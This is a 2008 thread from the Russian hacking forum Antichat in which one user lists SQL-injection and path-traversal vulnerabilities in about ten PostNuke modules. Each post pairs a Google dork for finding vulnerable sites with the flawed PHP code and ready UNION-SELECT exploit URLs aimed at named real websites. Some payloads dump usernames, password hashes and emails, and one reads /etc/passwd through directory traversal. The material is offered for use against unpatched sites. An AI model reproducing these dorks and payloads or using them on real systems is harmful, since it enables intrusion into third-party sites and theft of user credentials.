ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости модулей PostNuke
  #1  
Старый 16.12.2008, 00:38
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию Уязвимости модулей PostNuke

PostNuke. Модуль:Subjects SQL

Уязвимый продукт: Модуль:Subjects Функция: printpage
Версия: <=1.5
Дорк: "inurl:module=subjects"

Уязвимый кусок кода:
PHP код:
    $result $dbconn->Execute("SELECT $column[pageid]$column[parentpageid]
                           
$column[subid]$subcolumn[subname]$column[pagetitle]
                           
$column[pagecontent]$column[pagefile],
                           
$column[pageauthor]$column[pageauthoremail]$column[pageauthorurl]
                           
$column[pagedatetime]$column[pagecounter] 
                           FROM 
$pntable[subpages]$pntable[subjects] 
                           WHERE 
$column[pageid]=$pageid AND 
                           
$column[subid]=$subcolumn[subid]"); 
Я бы хотел написать, что из кода видно. что уязвимый параметр pageid, но это конечно не так .
Из этого кода нифига не видно. если вы до этого не сталкивались с этим движком, так что придётся Вам поверить мне на слово

Пример уязвимости:
http://rentflat.ru/index.php?module=subjects&func=printpage&pageid=-3+union+select+1,2,3,4,concat(pn_uname,0x3a,pn_pas s,0x3a,pn_email),6,7,8,9,0,11,12,13+from+nuke_user s+limit+1,1/*

Примечание: В данный момент существует версия этого модуля 2.01, в которой эта бага исправлена, но публикую её т.к. модуль достаточно популярен, и мне не встречались сайты с исправленной версией. в основном стоит эта.
 
Ответить с цитированием

  #2  
Старый 16.12.2008, 00:39
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

PostNuke. Модуль:FormExpress Blind-SQL

Уязвимый продукт: Модуль:FormExpress
Версия: 0.3.5
Дорк: "inurl:module=FormExpress"

Уязвимый кусок кода:
PHP код:
            $sql 'SELECT '.$this->FormExpressCache_column['form_data']
                  .
'  FROM '.$this->FormExpressCache
                  
.' WHERE '.$this->FormExpressCache_column['form_id'].' = ' 
                           
pnVarPrepForStore($form_id); 
Уязвимый параметр form_id

Пример уязвимости:
http://www.westlakehomeinspections.com/index.php?module=FormExpress&func=display_form&for m_id=1*if(substring(version(),1,1)=5,1,2)
 
Ответить с цитированием

  #3  
Старый 16.12.2008, 18:55
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

PostNuke. Модуль: pnTresMailer SQL

Уязвимый продукт: Модуль: pnTresMailer
Версия: 6.2 Проверял так-же на 6.03 и 6.1 Уязвимость присутствует
Дорк: "inurl:module=pnTresMailer"
Условие: "magic_quotes-off"

Уязвимый кусок кода:
PHP код:
$sql "SELECT arch_message FROM $prefix"._nl_archive." WHERE arch_mid = '$arch_mid'"
Уязвимый параметр arch_mid

Эксплоит:
Цитата:
index.php?op=modload&name=pnTresMailer&file=index& req=PreviewArchive&arch_mid=-1'+union+select+concat_ws(0x3a,User(),Database(),V ersion())/*
Пример уязвимости:
http://www.owa.sjp-darmstadt.de/index.php?op=modload&name=pnTresMailer&file=index& req=PreviewArchive&arch_mid=-1'+union+select+concat_ws(0x3a,User(),Database(),V ersion())/*

Последний раз редактировалось jokester; 20.12.2008 в 13:47..
 
Ответить с цитированием

  #4  
Старый 16.12.2008, 20:02
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

PostNuke. Модуль: PagEd SQL

Уязвимый продукт: Модуль: PagEd(он-же paged)
Версия: 0.9
Дорк: "inurl:module=paged"
Условие: "нет"

Код приводить считаю не целесообразным т.к. фильтрация отсутствует совсем, уязвимых параметров куча

Эксплоит: (примеры)
Цитата:
index.php?module=paged&topic_id=4&topictoview=3+un ion+select+1,concat_ws(0x3a,User(),Database(),Vers ion()),3,4/*
index.php?module=paged&page_id=888+union+select+co ncat_ws(0x3a,User(),Database(),Version()),2,3,4/*
index.php?module=paged&file=index&topic_id=1&page_ id=444+union+select+concat_ws(0x3a,User(),Database (),Version()),2,3,4/*
Примеры уязвимости:
http://www.owa.sjp-darmstadt.de/index.php?module=paged&topic_id=4&topictoview=3+un ion+select+1,concat_ws(0x3a,User(),Database(),Vers ion()),3,4/*

http://www.owa.sjp-darmstadt.de/index.php?module=paged&page_id=888+union+select+co ncat_ws(0x3a,User(),Database(),Version()),2,3,4/*

http://www.owa.sjp-darmstadt.de/index.php?module=paged&file=index&topic_id=1&page_ id=444+union+select+concat_ws(0x3a,User(),Database (),Version()),2,3,4/*

Последний раз редактировалось jokester; 16.12.2008 в 20:04..
 
Ответить с цитированием

  #5  
Старый 16.12.2008, 21:00
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

PostNuke. Модуль: ProdReviews SQL

Уязвимый продукт: Модуль: ProdReviews
Версия: 0.42
Дорк: "inurl:module=ProdReviews"
Условие: "нет"

Уязвимый кусок кода:
PHP код:
function showcontent()
...
 
$query "SELECT * FROM $pntable[prodreviews] WHERE $column[id]=".pnVarPrepForStore($id).""
Уязвимый параметр id

Эксплоит:
Цитата:
index.php?module=ProdReviews&func=showcontent&id=-4+union+select+1,2,3,concat_ws(0x3a,User(),Databas e(),Version()),5,6,7,8,9,0,11,12,13,14,15/*
Пример уязвимости:
http://www.gesundheit.malzminden.de/index.php?module=ProdReviews&func=showcontent&id=-4+union+select+1,2,3,concat_ws(0x3a,User(),Databas e(),Version()),5,6,7,8,9,0,11,12,13,14,15/*
 
Ответить с цитированием

  #6  
Старый 18.12.2008, 00:22
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

PostNuke. Модуль: concert SQL

Уязвимый продукт: Модуль: concert
Версия: 0.4
Дорк: "inurl:module=concert"
Условие: "нет"

Уязвимый кусок кода:
PHP код:
    $sql "SELECT *
            FROM 
$concerttable
            WHERE 
$concertcolumn[dc_id] = " pnVarPrepForStore($dc_id); 
Уязвимый параметр dc_id


Пример уязвимости:
http://www.palimpsest.com.au/index.php?module=concert&func=display&dc_id=-001+union+select+1,concat_ws(0x3a,User(),Database( ),Version()),3,44,5,6,7,8,9,0,11,12,13,14,15,16,17 ,18,19,20,21
 
Ответить с цитированием

  #7  
Старый 18.12.2008, 02:16
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

PostNuke. Модуль: Credits Чтение произвольных файлов(Это стандартный модуль)

Уязвимый продукт: Модуль: Credits
Версия: 1.1
Дорк: "inurl:module=Credits"
Условие: "нет"

Код к сожалению показать не могу, просто не нашёл его т.к. версия не самая новая, а в версии 1.2 этого бага нет, но описания этой баги нигде не увидел, модуль стандартный версия такая попадается часто, поэтому выкладываю.

Итак переходим по ссылке
http://site.com/index.php?module=Credits
Сдесь показаны все модули и их версии, сразу можно посмотреть версию нашего модуля "Credits", если она нас устраивает нажимаем на просмотр лицензии, или чего там можно посмотреть на любом доступном для этого модуле в разделе "Documentation"

Перехватываем пакет Смотрим:
Цитата:
Credits version 1.1
Credits 1.1
authid=536b87a20a8b57bb257834817225ceba
crdirectory=Credits
crpath=docs/license.txt
heading=License
displayname=Credits
version=1.1
submit.x=9
submit.y=5
Думаю тут всё понятно, нам нужно например etc/passwd тогда меняем:
Цитата:
crdirectory=../../../../../../../../../../../../
crpath=/etc/passwd
И наслаждаемся

Пример уязвимости:
http://www.obernet.org/index.php?module=Credits&func=display Можете попробовать сдесь
 
Ответить с цитированием

  #8  
Старый 18.12.2008, 21:28
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

PostNuke. Модуль: OpenRealty SQL

Уязвимый продукт: Модуль: OpenRealty
Версия: 71c
Дорк: "inurl:module=OpenRealty"
Условие: "нет"

1 Код
PHP код:
    $sql "SELECT $realtyhomescolumn[or_agent],
                
$realtyhomescolumn[or_mls],
                
$realtyhomescolumn[or_title],
                
$realtyhomescolumn[or_address],
                
$realtyhomescolumn[or_city],
                
$realtyhomescolumn[or_state],
                
$realtyhomescolumn[or_zip],
                
$realtyhomescolumn[or_neighborhood],
                
$realtyhomescolumn[or_virtualtour],
                
$realtyhomescolumn[or_yearbuilt],
                
$realtyhomescolumn[or_sqfeet],
                
$realtyhomescolumn[or_lotsize],
                
$realtyhomescolumn[or_garagesize],
                
$realtyhomescolumn[or_type],
                
$realtyhomescolumn[or_beds],
                
$realtyhomescolumn[or_baths],
                
$realtyhomescolumn[or_numfloors],
                
$realtyhomescolumn[or_price],
                
$realtyhomescolumn[or_status],
                
$realtyhomescolumn[or_featured],
                
$realtyhomescolumn[or_dateposted],
                
$realtyhomescolumn[or_previewdesc],
                
$realtyhomescolumn[or_fulldesc],";
    for(
$x=1;$x<=20;$x++) {
        
$featurenum "or_pfeat".$x;
        
$sql .= "$realtyhomescolumn[$featurenum],";
    }
    for(
$x=1;$x<=20;$x++) {
        
$featurenum "or_cfeat".$x;
        
$sql .= "$realtyhomescolumn[$featurenum],";
    }
    
$sql .= "    $realtyhomescolumn[or_notes]
            FROM 
$realtyhomes 
            WHERE 
$realtyhomescolumn[or_hid]=$or_hid"
Вот такие вот жёсткие запросы

Уязвимый параметр or_hid
Пример уязвимости:
http://www.alpujar.com/english/index.php?module=OpenRealty&func=display&or_hid=-274+union+select+1,2,concat_ws(0x3a,User(),Databas e(),Version()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1 ,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 ,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,64/*

2 Код:
PHP код:
$sql "SELECT $realtycolumn[or_pictype]$realtycolumn[or_picdata] FROM $realtytable WHERE $realtycolumn[or_picid] = $or_picid"
Уязвимый параметр or_picid
Пример уязвимости:
http://www.bulgarianpropertiesonline.com/modules/OpenRealty/image.php?or_picid=-1074+union+select+1,concat_ws(0x3a,User(),Database (),Version())/*
 
Ответить с цитированием

  #9  
Старый 19.12.2008, 00:33
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

PostNuke. Модуль: phPro(Девичья фамилия: phProfession) SQL

Уязвимый продукт: Модуль: phPro(phProfession)
Версия: 3.0
Дорк: "inurl:module=phPro"
Условие: "нет"

Уязвимый кусок кода:
PHP код:
    $sql "SELECT $joblistingcolumn[vacancy],
                   
$joblistingcolumn[jid],
                   
$jobdepartmentcolumn[department],
                   
$jobdepartmentcolumn[id],
                   
$joblocationcolumn[location],
                   
$joblocationcolumn[id],
                   
$jobsalarycolumn[salary],
                   
$jobsalarycolumn[id],
                   
$joblistingcolumn[responsibilities],
                   
$joblistingcolumn[qualifications],
                   
$joblistingcolumn[cname],
                   
$joblistingcolumn[cmail],
                   
$joblistingcolumn[posted],
                   
$joblistingcolumn[hits],
                   
$joblistingcolumn[fk_pn_uid],
                   
$joblistingcolumn[fk_expper_id],
                   
$joblistingcolumn[expirytime],
                   
$joblistingcolumn[active]
            FROM 
$joblistingtable,
                
$jobdepartmenttable,
                
$joblocationtable,
                
$jobsalarytable
            WHERE 
$jobdepartmentcolumn[id] = $joblistingcolumn[fk_department]
            AND 
$joblocationcolumn[id] = $joblistingcolumn[fk_location]
            AND 
$jobsalarycolumn[id] = $joblistingcolumn[fk_salary]
            AND 
$joblistingcolumn[jid] = " pnVarPrepForStore($jid); 
Уязвимый параметр jid

История с этим модулем такая, там откуда я его сливал в папке "phprofession" лежали два архива: "phPro_v3.0alpha" и "phprofession2.5.4" код выше из "phPro" , а в "phprofession" в коде даже параметра такого нет, ставить я его не стал(версия старая), а вот в гугле глянул. Оказалось что запись "module=phProfession" в урле можно запросто изменить на "module=phPro" и всё будет нормольно. а вот наоборот нет. Тоесть совместимость вроде должна быть у новой версии со старой, а тут наоборот (разбираться с этой байдой не стал, т.к к делу отношения не имеет.Кому хочется привожу оба линка).

Примеры уязвимости:
http://www.hillelsaroundchicago.org/index.php?module=phPro&func=display&jid=-57+union+select+1,concat_ws(0x3a,User(),Database() ,Version()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0
http://www.arundellodge.org/index.php?module=phProfession&func=display&jid=-57+union+select+1,concat_ws(0x3a,User(),Database() ,Version()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0
 
Ответить с цитированием

  #10  
Старый 20.12.2008, 13:46
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

PostNuke. Модуль: recipes SQL

Уязвимый продукт: Модуль: recipes
Версия: <=1.2
Дорк: "inurl:module=recipes"
Условие: "нет"

1 Код
PHP код:
    $sql "SELECT $recipescolumn[cid]
                            
$recipescolumn[title],
                   
$recipescolumn[ingredientsfor],
                   
$recipescolumn[ingredients],
                   
$recipescolumn[description],
                   
$recipescolumn[note],
                                   
$recipescolumn[origin],
                                   
$recipescolumn[wine],                                                
                   
$recipescolumn[image],
                   
$recipescolumn[date],
                   
$recipescolumn[author],
                   
$recipescolumn[email],
                                     
$recipescolumn[chkvegetarian]
                                     
$recipescolumn[chkmilkandderivatives],
                                     
$recipescolumn[chkwheatflour],
                                     
$recipescolumn[chkeggs],
                                     
$recipescolumn[pagecounter],
                                     
$recipescolumn[submitter]                                                                                                                                                                          
                                                                                                                                                                                                                                                
            FROM 
$recipestable
            WHERE 
$recipescolumn[lid] = " pnVarPrepForStore($lid); 

Уязвимый параметр lid
Пример уязвимости:
http://footprints-family-recipes.com/index.php?module=recipes&func=display&lid=-48+union+select+1,concat_ws(0x3a,User(),Database() ,Version()),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,1 8/*

Вобщем-то фильтрация отсутствует напрочь, так что скули везде, можно выкладывать весь модуль

Уязвимый параметр pid

Пример уязвимости:
http://footprints-family-recipes.com/index.php?module=recipes&func=catview&pid=-9+union+select+1,concat_ws(0x3a,User(),Database(), Version())/*

И т.д.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ